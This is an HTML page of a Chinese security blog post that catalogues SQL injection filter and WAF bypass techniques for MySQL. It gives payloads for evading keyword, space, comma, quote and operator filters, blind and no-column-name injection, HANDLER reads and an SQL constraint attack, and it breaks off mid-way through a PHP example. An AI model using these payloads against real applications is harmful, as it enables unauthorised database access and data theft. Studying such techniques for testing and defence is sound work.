

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#265689e3">
  <meta name="author" content="Pho3n1x">
  <meta name="keywords" content="">
  
    <meta name="description" content="今天总结一下sql注入过程中目前阶段碰到的主要过滤问题。 0x00 基本问题sql注入过程中，为了防止注入，代码中一般会进行输入字符的过滤或拦截。其中过滤指的是输入的内容被删除or替换成了别的字符，拦截指的是检测到指定内容存在后，直接返回错误，不再进行后续的操作。 0x01 and&#x2F;or1.尝试双写or大小写绕过 2.运算符代替:&amp;&amp;,|| 3.^运算符，例如:?id&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入绕过">
<meta property="og:url" content="https://pho3n1x-web.github.io/2022/06/16/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="Pho3n1x&#39;s Blog">
<meta property="og:description" content="今天总结一下sql注入过程中目前阶段碰到的主要过滤问题。 0x00 基本问题sql注入过程中，为了防止注入，代码中一般会进行输入字符的过滤或拦截。其中过滤指的是输入的内容被删除or替换成了别的字符，拦截指的是检测到指定内容存在后，直接返回错误，不再进行后续的操作。 0x01 and&#x2F;or1.尝试双写or大小写绕过 2.运算符代替:&amp;&amp;,|| 3.^运算符，例如:?id&amp;#">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-06-16T00:30:49.000Z">
<meta property="article:modified_time" content="2022-06-16T00:30:49.000Z">
<meta property="article:author" content="Pho3n1x">
<meta property="article:tag" content="sql">
<meta property="article:tag" content="WAF绕过">
<meta name="twitter:card" content="summary_large_image">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>sql注入绕过 - Pho3n1x&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"pho3n1x-web.github.io","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Pho3n1x</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/1322308.jpeg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="sql注入绕过"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-06-16 08:30" pubdate>
          June 16, 2022 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.3k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          39 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">sql注入绕过</h1>
            
            
              <div class="markdown-body">
                
                <p>今天总结一下sql注入过程中目前阶段碰到的主要过滤问题。</p>
<h4 id="0x00-基本问题"><a href="#0x00-基本问题" class="headerlink" title="0x00 基本问题"></a>0x00 基本问题</h4><p>sql注入过程中，为了防止注入，代码中一般会进行输入字符的过滤或拦截。其中过滤指的是输入的内容被删除or替换成了别的字符，拦截指的是检测到指定内容存在后，直接返回错误，不再进行后续的操作。</p>
<h4 id="0x01-and-or"><a href="#0x01-and-or" class="headerlink" title="0x01 and&#x2F;or"></a>0x01 and&#x2F;or</h4><p>1.尝试双写or大小写绕过</p>
<p>2.运算符代替:<code>&amp;&amp;</code>,<code>||</code></p>
<p>3.<code>^</code>运算符，例如:?id&#x3D;1^(1&#x3D;0) (1^0&#x3D;1,故返回id&#x3D;1的数据)</p>
<p>4.拼接<code>=</code>运算符，例如:?id&#x3D;1&#x3D;(1&#x3D;1) (1&#x3D;1为真，故返回id&#x3D;true即id&#x3D;1的数据(true&#x3D;1))</p>
<h4 id="0x02-空格"><a href="#0x02-空格" class="headerlink" title="0x02 空格"></a>0x02 空格</h4><p>1.注释&#x2F;**&#x2F;代替</p>
<p>2.<code>and/or</code>后面可以加偶数个<code>!或~</code>可以替代空格，也可以混合使用</p>
<p>3.<code>%09, %0a, %0b, %0c, %0d, %a0</code>等部分不可见字符绕过</p>
<p>4.巧用括号</p>
<h4 id="0x03-括号"><a href="#0x03-括号" class="headerlink" title="0x03 括号"></a>0x03 括号</h4><p>使用order by进行盲注，例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><br><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,&#123;<span class="hljs-string">&#x27;1&#x27;</span>&#125; <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">3</span> limit <span class="hljs-number">1</span>;<br></code></pre></td></tr></table></figure>

<p>通过修改大括号中的值，即可进行指定字符串与目标未知字符串的比较，如果大于则位置字符串排在前，如果小于则指定字符串排在前。通过limit来控制显示问题。由此可通过编写脚本进行注入。</p>
<h4 id="0x04-逗号"><a href="#0x04-逗号" class="headerlink" title="0x04 逗号"></a>0x04 逗号</h4><p>1.盲注</p>
<p>2.使用join语句。例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><br><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">1</span>)a <span class="hljs-keyword">join</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">2</span>)b <span class="hljs-keyword">join</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">3</span>)<br></code></pre></td></tr></table></figure>

<p>对于某些字符串处理函数，例如substr，可以通过substr(str from pos for len)的方法以避免使用括号，limit 0,1 可以通过limit 1 offset 1代替。</p>
<h4 id="0x05-引号"><a href="#0x05-引号" class="headerlink" title="0x05 引号"></a>0x05 引号</h4><p>1.考虑宽字节注入(存在编码问题时)</p>
<p>2.引号逃逸(当存在两个或以上数据输入时，通过\可以转义一个单引号，随后在下一个输入框or字段中写入注入代码，最后添加注释符，这时可巧妙的避开引号闭合问题)</p>
<h4 id="0x06-注释"><a href="#0x06-注释" class="headerlink" title="0x06 注释"></a>0x06 注释</h4><p>1.巧妙闭合单引号，例如：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br><span class="hljs-keyword">select</span> * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=<span class="hljs-string">&#x27;$id&#x27;</span>;<br>注入代码：?<span class="hljs-built_in">id</span>=1<span class="hljs-string">&#x27; union select 1,2,&#x27;</span>3<br></code></pre></td></tr></table></figure>

<h4 id="0x07-数字"><a href="#0x07-数字" class="headerlink" title="0x07 数字"></a>0x07 数字</h4><table>
<thead>
<tr>
<th>代替字符</th>
<th>数</th>
<th>代替字符</th>
<th>数</th>
<th>代替字符</th>
<th>数</th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>false、!pi()</td>
<td>0</td>
<td>ceil(pi()*pi())</td>
<td>10</td>
<td>A</td>
<td>ceil((pi()+pi())*pi())</td>
<td>20</td>
<td>K</td>
</tr>
<tr>
<td>true、!(!pi())</td>
<td>1</td>
<td>ceil(pi()*pi())+true</td>
<td>11</td>
<td>B</td>
<td>ceil(ceil(pi())*version())</td>
<td>21</td>
<td>L</td>
</tr>
<tr>
<td>true+true</td>
<td>2</td>
<td>ceil(pi()+pi()+version())</td>
<td>12</td>
<td>C</td>
<td>ceil(pi()*ceil(pi()+pi()))</td>
<td>22</td>
<td>M</td>
</tr>
<tr>
<td>floor(pi());~~pi()</td>
<td>3</td>
<td>floor(pi()*pi()+pi())</td>
<td>13</td>
<td>D</td>
<td>ceil((pi()+ceil(pi()))*pi())</td>
<td>23</td>
<td>N</td>
</tr>
<tr>
<td>ceil(pi())</td>
<td>4</td>
<td>ceil(pi()*pi()+pi())</td>
<td>14</td>
<td>E</td>
<td>ceil(pi())*ceil(version())</td>
<td>24</td>
<td>O</td>
</tr>
<tr>
<td>floor(version()) &#x2F;&#x2F;注意版本</td>
<td>5</td>
<td>ceil(pi()*pi()+version())</td>
<td>15</td>
<td>F</td>
<td>floor(pi()*(version()+pi()))</td>
<td>25</td>
<td>P</td>
</tr>
<tr>
<td>ceil(version())</td>
<td>6</td>
<td>floor(pi()*version())</td>
<td>16</td>
<td>G</td>
<td>floor(version()*version())</td>
<td>26</td>
<td>Q</td>
</tr>
<tr>
<td>ceil(pi()+pi())</td>
<td>7</td>
<td>ceil(pi()*version())</td>
<td>17</td>
<td>H</td>
<td>ceil(version()*version())</td>
<td>27</td>
<td>R</td>
</tr>
<tr>
<td>floor(version()+pi())</td>
<td>8</td>
<td>ceil(pi()*version())+true</td>
<td>18</td>
<td>I</td>
<td>ceil(pi()*pi()*pi()-pi())</td>
<td>28</td>
<td>S</td>
</tr>
<tr>
<td>floor(pi()*pi())</td>
<td>9</td>
<td>floor((pi()+pi())*pi())</td>
<td>19</td>
<td>J</td>
<td>floor(pi()*pi()*floor(pi()))</td>
<td>29</td>
<td>T</td>
</tr>
</tbody></table>
<h4 id="0x08-等于号，大于号，小于号"><a href="#0x08-等于号，大于号，小于号" class="headerlink" title="0x08 等于号，大于号，小于号"></a>0x08 等于号，大于号，小于号</h4><p>等于号可以通过like绕过，大于号小于号主要使用greatest函数，strcmp函数，between and操作符代替。</p>
<h4 id="0x09-常见函数-符号总结"><a href="#0x09-常见函数-符号总结" class="headerlink" title="0x09 常见函数&#x2F;符号总结"></a>0x09 常见函数&#x2F;符号总结</h4><h5 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a>注释符</h5><table>
<thead>
<tr>
<th>单行注释</th>
<th>单行注释</th>
<th>单行注释</th>
<th>多行(内联)注释</th>
</tr>
</thead>
<tbody><tr>
<td><code>#</code></td>
<td><code>-- x //x为任意字符</code></td>
<td><code>;%00</code></td>
<td><code>/*任意内容*/</code></td>
</tr>
</tbody></table>
<h5 id="常用运算符"><a href="#常用运算符" class="headerlink" title="常用运算符"></a>常用运算符</h5><table>
<thead>
<tr>
<th>运算符</th>
<th>说明</th>
<th>运算符</th>
<th>说明</th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>&amp;&amp;</td>
<td>与，同and。</td>
<td>\</td>
<td>\</td>
<td></td>
<td>或，同or。</td>
</tr>
<tr>
<td>!</td>
<td>非，同not。</td>
<td>~</td>
<td>一元比特反转。</td>
<td></td>
<td></td>
</tr>
<tr>
<td>^</td>
<td>异或，同xor。</td>
<td>+</td>
<td>加，可替代空格，如<code>select+user()</code>。</td>
<td></td>
<td></td>
</tr>
</tbody></table>
<h5 id="系统信息函数"><a href="#系统信息函数" class="headerlink" title="系统信息函数"></a>系统信息函数</h5><table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>USER()</td>
<td>获取当前操作句柄的用户名，同SESSION_USER()、CURRENT_USER()，有时也用SYSTEM_USER()。</td>
</tr>
<tr>
<td>DATABASE()</td>
<td>获取当前选择的数据库名，同SCHEMA()。</td>
</tr>
<tr>
<td>VERSION()</td>
<td>获取当前版本信息。</td>
</tr>
</tbody></table>
<h5 id="进制转换"><a href="#进制转换" class="headerlink" title="进制转换"></a>进制转换</h5><table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>ORD(str)</td>
<td>返回字符串第一个字符的ASCII值。</td>
</tr>
<tr>
<td>OCT(N)</td>
<td>以字符串形式返回 <code>N</code> 的八进制数，<code>N</code> 是一个BIGINT 型数值，作用相当于<code>CONV(N,10,8)</code>。</td>
</tr>
<tr>
<td>HEX(N_S)</td>
<td>参数为字符串时，返回 <code>N_or_S</code> 的16进制字符串形式，为数字时，返回其16进制数形式。</td>
</tr>
<tr>
<td>UNHEX(str)</td>
<td><code>HEX(str)</code> 的逆向函数。将参数中的每一对16进制数字都转换为10进制数字，然后再转换成 ASCII 码所对应的字符。</td>
</tr>
<tr>
<td>BIN(N)</td>
<td>返回十进制数值 <code>N</code> 的二进制数值的字符串表现形式。</td>
</tr>
<tr>
<td>ASCII(str)</td>
<td>同<code>ORD(string)</code>。</td>
</tr>
<tr>
<td>CONV(N,from_base,to_base)</td>
<td>将数值型参数 <code>N</code> 由初始进制 <code>from_base</code> 转换为目标进制 <code>to_base</code> 的形式并返回。</td>
</tr>
<tr>
<td>CHAR(N,… [USING charset_name])</td>
<td>将每一个参数 <code>N</code> 都解释为整数，返回由这些整数在 ASCII 码中所对应字符所组成的字符串。</td>
</tr>
</tbody></table>
<h5 id="字符截取-拼接"><a href="#字符截取-拼接" class="headerlink" title="字符截取&#x2F;拼接"></a>字符截取&#x2F;拼接</h5><table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>SUBSTR(str,N_start,N_length)</td>
<td>对指定字符串进行截取，为SUBSTRING的简单版。</td>
</tr>
<tr>
<td>SUBSTRING()</td>
<td>多种格式<code>SUBSTRING(str,pos)、SUBSTRING(str FROM pos)、SUBSTRING(str,pos,len)、SUBSTRING(str FROM pos FOR len)</code>。</td>
</tr>
<tr>
<td>RIGHT(str,len)</td>
<td>对指定字符串从<strong>最右边</strong>截取指定长度。</td>
</tr>
<tr>
<td>LEFT(str,len)</td>
<td>对指定字符串从<strong>最左边</strong>截取指定长度。</td>
</tr>
<tr>
<td><strong>RPAD(str,len,padstr)</strong></td>
<td>在 <code>str</code> 右方补齐 <code>len</code> 位的字符串 <code>padstr</code>，返回新字符串。如果 <code>str</code> 长度大于 <code>len</code>，则返回值的长度将缩减到 <code>len</code> 所指定的长度。</td>
</tr>
<tr>
<td><strong>LPAD(str,len,padstr)</strong></td>
<td>与RPAD相似，在<code>str</code>左边补齐。</td>
</tr>
<tr>
<td>MID(str,pos,len)</td>
<td>同于 <code>SUBSTRING(str,pos,len)</code>。</td>
</tr>
<tr>
<td><strong>INSERT(str,pos,len,newstr)</strong></td>
<td>在原始字符串 <code>str</code> 中，将自左数第 <code>pos</code> 位开始，长度为 <code>len</code> 个字符的字符串替换为新字符串 <code>newstr</code>，然后返回经过替换后的字符串。<code>INSERT(str,len,1,0x0)</code>可当做截取函数。</td>
</tr>
<tr>
<td>CONCAT(str1,str2…)</td>
<td>函数用于将多个字符串合并为一个字符串</td>
</tr>
<tr>
<td>GROUP_CONCAT(…)</td>
<td>返回一个字符串结果，该结果由分组中的值连接组合而成。</td>
</tr>
<tr>
<td><strong>MAKE_SET(bits,str1,str2,…)</strong></td>
<td>根据参数1，返回所输入其他的参数值。可用作布尔盲注，如：<code>EXP(MAKE_SET((LENGTH(DATABASE())&gt;8)+1,&#39;1&#39;,&#39;710&#39;))</code>。</td>
</tr>
</tbody></table>
<h5 id="常见全局变量"><a href="#常见全局变量" class="headerlink" title="常见全局变量"></a>常见全局变量</h5><table>
<thead>
<tr>
<th>变量</th>
<th>说明</th>
<th>变量</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>@@VERSION</td>
<td>返回版本信息</td>
<td>@@HOSTNAME</td>
<td>返回安装的计算机名称</td>
</tr>
<tr>
<td>@@GLOBAL.VERSION</td>
<td>同<code>@@VERSION</code></td>
<td>@@BASEDIR</td>
<td>返回MYSQL绝对路径</td>
</tr>
</tbody></table>
<p>PS：查看全部全局变量<code>SHOW GLOBAL VARIABLES;</code>。</p>
<h5 id="其他常用函数-语句"><a href="#其他常用函数-语句" class="headerlink" title="其他常用函数&#x2F;语句"></a>其他常用函数&#x2F;语句</h5><table>
<thead>
<tr>
<th>函数&#x2F;语句</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>LENGTH(str)</td>
<td>返回字符串的长度。</td>
</tr>
<tr>
<td>PI()</td>
<td>返回π的具体数值。</td>
</tr>
<tr>
<td>REGEXP “statement”</td>
<td>正则匹配数据，返回值为布尔值。</td>
</tr>
<tr>
<td>LIKE “statement”</td>
<td>匹配数据，%代表任意内容。返回值为布尔值。</td>
</tr>
<tr>
<td>RLIKE “statement”</td>
<td>与regexp相同。</td>
</tr>
<tr>
<td>LOCATE(substr,str,[pos])</td>
<td>返回子字符串第一次出现的位置。</td>
</tr>
<tr>
<td>POSITION(substr IN str)</td>
<td>等同于 <code>LOCATE()</code>。</td>
</tr>
<tr>
<td>LOWER(str)</td>
<td>将字符串的大写字母全部转成小写。同：<code>LCASE(str)</code>。</td>
</tr>
<tr>
<td>UPPER(str)</td>
<td>将字符串的小写字母全部转成大写。同：<code>UCASE(str)</code>。</td>
</tr>
<tr>
<td>ELT(N,str1,str2,str3,…)</td>
<td>与<code>MAKE_SET(bit,str1,str2...)</code>类似，根据<code>N</code>返回参数值。</td>
</tr>
<tr>
<td>NULLIF(expr1,expr2)</td>
<td>若expr1与expr2相同，则返回expr1，否则返回NULL。</td>
</tr>
<tr>
<td>CHARSET(str)</td>
<td>返回字符串使用的字符集。</td>
</tr>
<tr>
<td>DECODE(<em>crypt_str</em>,<em>pass_str</em>)</td>
<td>使用 pass_str 作为密码，解密加密字符串 crypt_str。加密函数：<code>ENCODE(str,pass_str)</code>。</td>
</tr>
</tbody></table>
<h4 id="0x0a-handler语句代替select-mysql"><a href="#0x0a-handler语句代替select-mysql" class="headerlink" title="0x0a handler语句代替select[mysql]"></a>0x0a handler语句代替select[mysql]</h4><blockquote>
<p>mysql除可使用select查询表中的数据，也可使用handler语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不具备select语句的所有功能。它是mysql专用的语句，并没有包含到SQL标准中。[故其他数据库不可用]</p>
</blockquote>
<p>语法结构：</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs inform7"><br>HANDLER tbl_name <span class="hljs-keyword">OPEN</span> <span class="hljs-comment">[ <span class="hljs-comment">[AS]</span> alias]</span><br><br>HANDLER tbl_name READ index_name &#123; = | &lt;= | &gt;= | &lt; | &gt; &#125; (value1,value2,...)<br>    <span class="hljs-comment">[ WHERE where_condition ]</span> <span class="hljs-comment">[LIMIT ... ]</span><br>HANDLER tbl_name READ index_name &#123; FIRST | NEXT | PREV | LAST &#125;<br>    <span class="hljs-comment">[ WHERE where_condition ]</span> <span class="hljs-comment">[LIMIT ... ]</span><br>HANDLER tbl_name READ &#123; FIRST | NEXT &#125;<br>    <span class="hljs-comment">[ WHERE where_condition ]</span> <span class="hljs-comment">[LIMIT ... ]</span><br><br>HANDLER tbl_name CLOSE<br></code></pre></td></tr></table></figure>

<p>如：通过handler语句查询users表的内容</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver"><br>handler users <span class="hljs-built_in">open</span> <span class="hljs-keyword">as</span> yunensec; <span class="hljs-comment">#指定数据表进行载入并将返回句柄重命名</span><br>handler yunensec <span class="hljs-built_in">read</span> <span class="hljs-keyword">first</span>; <span class="hljs-comment">#读取指定表/句柄的首行数据</span><br>handler yunensec <span class="hljs-built_in">read</span> next; <span class="hljs-comment">#读取指定表/句柄的下一行数据</span><br>handler yunensec <span class="hljs-built_in">read</span> next; <span class="hljs-comment">#读取指定表/句柄的下一行数据</span><br>...<br>handler yunensec <span class="hljs-built_in">close</span>; <span class="hljs-comment">#关闭句柄</span><br></code></pre></td></tr></table></figure>

<h4 id="0x0b-无列名注入"><a href="#0x0b-无列名注入" class="headerlink" title="0x0b 无列名注入"></a>0x0b 无列名注入</h4><p>在不知道列名的情况下，除了使用order by盲注外，还可以直接使用select进行盲注，即select无列名注入。例如：</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs n1ql"><br><span class="hljs-keyword">select</span> <span class="hljs-symbol">`1`</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> users) <span class="hljs-keyword">as</span> a;<br></code></pre></td></tr></table></figure>

<p>具体可以参考<a target="_blank" rel="noopener" href="https://github.com/su29029/su29029.github.io/blob/master/_posts/2020-6-23-V1lu0%E5%AE%9E%E9%AA%8C%E5%AE%A4%E6%8B%9B%E6%96%B0hard_sql.md">V1lu0实验室招新hard_sql</a>或<a target="_blank" rel="noopener" href="https://x5tar.com/2019/10/24/cnss-recruit-2019-web/#hard-sql">CNSS 2019招新hard_sql</a>。</p>
<h4 id="0x0c-其他"><a href="#0x0c-其他" class="headerlink" title="0x0c 其他"></a>0x0c 其他</h4><h5 id="UPDATE注入重复字段赋值"><a href="#UPDATE注入重复字段赋值" class="headerlink" title="UPDATE注入重复字段赋值"></a>UPDATE注入重复字段赋值</h5><p>即：<code>UPDATA table_name set field1=new_value,field1=new_value2 [where子句]</code>，最终field1字段的内容为new_value2，可用这个特性来进行UPDATA注入。如：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">UPDATE</span> <span class="hljs-built_in">table_name</span> <span class="hljs-keyword">set</span> field1=new_value,field1=(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span>()) [<span class="hljs-keyword">where</span>子句]<br></code></pre></td></tr></table></figure>

<h5 id="sql约束攻击"><a href="#sql约束攻击" class="headerlink" title="sql约束攻击"></a>sql约束攻击</h5><p>举个例子，假设我们创建了一个数据表：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><br><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">TABLE</span> users(<br>    username <span class="hljs-type">varchar</span>(<span class="hljs-number">25</span>),<br>    <span class="hljs-keyword">password</span> <span class="hljs-type">varchar</span>(<span class="hljs-number">25</span>)<br>)<br></code></pre></td></tr></table></figure>

<p>这时候我们进行登录注册的相关代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs php"><br><span class="hljs-comment">// 注册</span><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$conn</span> = <span class="hljs-title function_ invoke__">mysqli_connect</span>(<span class="hljs-string">&quot;127.0.0.1:3306&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;db&quot;</span>);<br><span class="hljs-keyword">if</span> (!<span class="hljs-variable">$conn</span>) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Connection failed: &quot;</span> . <span class="hljs-title function_ invoke__">mysqli_connect_error</span>());<br>&#125;<br><span class="hljs-variable">$username</span> = <span class="hljs-title function_ invoke__">addslashes</span>(@<span class="hljs-variable">$_POST</span>[<span 